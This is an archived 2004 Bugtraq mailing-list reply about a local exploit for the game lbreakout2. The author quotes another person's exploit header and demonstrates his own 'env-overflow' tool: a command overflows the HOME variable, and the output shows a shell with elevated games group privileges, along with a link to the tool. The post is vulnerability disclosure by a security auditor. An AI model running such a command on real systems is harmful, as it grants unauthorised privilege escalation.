lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20040223202602.GA16855@steve.org.uk>
Date: Mon, 23 Feb 2004 20:26:03 +0000
From: Steve Kemp <steve@...ve.org.uk>
To: Li0n7@...la.fr
Cc: bugtraq@...urityfocus.com
Subject: Re: lbreakout2 < 2.4beta-2 local exploit


On Sun, Feb 22, 2004 at 01:45:45PM -0000, Li0n7@...la.fr wrote:

> /* 
>  * lbreakout2 < 2.4beta-2 local exploit by Li0n7@...la.fr
>  * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@...dent.uu.se>
>  * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
>  *
>  */

    I much prefer mine ;)

    Using the `env-overflow` tool this may be exploited without
   the need for a valid X11 display - ie.  ssh/telnet access
   sufficient - or any explicit coding:

   skx@uml:~$ ./env-overflow /usr/games/lbreakout2 1084 HOME
   ... snip ...
   sh-2.05a$
   sh-2.05a$ id
   uid=1000(skx) gid=100(users) egid=60(games) groups=100(users)

   Where env-overflow lives here:

   	http://www.steve.org.uk/Hacks/generic.html

Steve
--
# Debian Security Audit Project
http://www.shellcode.org/Audit/




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ